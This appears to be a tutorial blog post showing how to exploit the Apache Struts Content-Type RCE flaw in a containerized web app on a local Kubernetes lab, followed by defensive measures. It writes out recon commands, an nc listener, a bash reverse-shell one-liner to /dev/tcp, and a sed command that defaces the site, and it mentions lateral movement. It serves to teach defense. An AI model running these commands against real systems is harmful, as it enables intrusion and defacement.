How to Exploit a Vulnerability in Containerized Websites
Written on
Understanding the Exploit Process
This guide outlines the method of exploiting a vulnerability in a web application hosted as a container, along with protective measures to mitigate such attacks. While many resources illustrate how to compromise a Kubernetes cluster or a container orchestrator post-compromise, few delve into the initial hacking process of a secured application behind a firewall.
The goal here is to demonstrate how an attacker can exploit a flaw in a web application to access a pod running in Kubernetes. These tactics are applicable across various container platforms, allowing us to better secure our applications against similar threats.
The Objective
Typically, web applications are protected by firewalls and various security measures, making direct access challenging. However, outbound firewall rules tend to be less strict, allowing applications to connect to the internet. We will leverage this to conduct our attack.
- Remote Code Execution (RCE)
- Establishing a Reverse Shell
- Causing Disruption
Initially, we will establish RCE on the target machine to execute commands. Subsequently, we will craft a command to initiate a reverse shell back to our attacking machine, as outbound connections are usually permitted by firewalls.
Setting Up the Target Application
Our target will be a Java-based web application utilizing the Apache Struts framework, hosted within a local Kubernetes cluster on Docker Desktop. The procedures described here are applicable regardless of the container hosting method.
To deploy the vulnerable Java web application, execute:
kubectl apply -f vulnerable-pod.yaml
Access the application via: [http://localhost:30004/](http://localhost:30004/).
Configuring the Attack Server
We will employ a Kali Linux container for our attack, which is a widely-used distribution equipped with numerous hacking tools. Set up your attack server with the following commands:
docker run --name kali --rm -it kalilinux/kali-rolling /bin/bash
apt-get update && apt-get install -y curl nmap nikto python3 nano dnsutils
Conducting Attack Reconnaissance
The initial phase of an attack involves reconnaissance to gather information about the target's technology stack, which aids in determining effective attack vectors.
Commonly used security testing tools can help scan for vulnerabilities. For instance, Nmap is essential for scanning network ranges to identify open ports and exposed services:
nmap -sT -p "80,135,443,445,30000-30100" host.docker.internal
Typically, port 80 should be open, while other ports may not provide significant insights. If SSH or RDP ports are accessible, cracking credentials could lead to a successful breach.
Identifying Vulnerabilities with Nikto
Nikto serves as a web security scanner to identify misconfigurations or vulnerabilities within the target application:
nikto -host host.docker.internal:30004
Here, we may uncover several security issues, including the Strutshock vulnerability. This flaw allows arbitrary code execution via crafted HTTP headers due to improper handling during file-upload attempts.
Steps for Exploiting the Vulnerability
Recognizing that our target is vulnerable to RCE, we will create a web request that directs back to our attacking server. The process involves listening for inbound connections on port 443, which is generally allowed by firewalls.
The crafted web request will include a malicious Content-Type header, which the Apache Struts application will mishandle, executing the injected code that connects back to our server.
Creating a Command and Control Server
To facilitate communication with our target, we will set up a Command and Control (C2) server:
docker run --name commandcontrol --rm -it -p 443:443 ubuntu /bin/bash
apt-get update && apt-get install -y ncat
Using Netcat on the C2 server, we can listen for incoming connections from the target application.
nc -lnvp 443
Establishing the Reverse Shell
A Python script can be utilized to form a malicious web request and send it to the target. The following command will initiate a reverse shell connection:
python3 attack.py http://host.docker.internal:30004/ "bash -i >& /dev/tcp/host.docker.internal/443 0>&1"
Upon successfully connecting, we can execute commands on the target through our C2 server.
Exploring the Compromised Target
With the target compromised, we can explore various options, including:
- Deploying malware
- Creating a C2 server within the target's network
- Lateral movement across the cluster
- Modifying website content
Modifying the Target Website
To demonstrate, we can alter a file in the Tomcat server to change the displayed message on the website:
cd /usr/local/tomcat/webapps/ROOT
sed -i 's/Welcome!/You have been Hacked!/g' showcase.jsp
After executing this command, any visitors to the website will notice the change.
Lateral Movement in the Kubernetes Cluster
Being aware that the target runs within a Kubernetes cluster, we can utilize kubectl to explore other pods and services, potentially gaining access to sensitive information.
Protecting Against Future Attacks
While this overview may be alarming, there are numerous defensive measures that can be implemented to prevent such attacks. The platform used to host your containers plays a crucial role in security.
#### Key Defense Strategies
- Vulnerability Scanning: Utilize tools like Snyk or Aqua to regularly scan for vulnerabilities.
- Policy Enforcement: Use policy agents to prevent running containers as root.
- Web Application Firewalls (WAF): Implement WAFs to block malicious HTTP requests.
- Network Policies: Limit outbound traffic to prevent unauthorized connections.
- Service Mesh: Employ solutions like Istio to enhance network security.
- Runtime Monitoring: Utilize tools to monitor for suspicious activities and respond accordingly.
- Least Privilege Principle: Ensure applications have only the necessary permissions to minimize potential damage.
This guide aims to provide insights into potential vulnerabilities within your applications, allowing for better protective measures against evolving threats. For those interested in hands-on practice, a complete guide is available on my GitHub.
Chapter 2: Video Tutorials
The first video titled "Hacking into your containers, and how to stop it!" provides an overview of vulnerabilities in containerized applications and defensive strategies.
The second video, "Learn to HACK for FREE using DOCKER containers (homelab)," offers practical insights into setting up a hacking environment using Docker.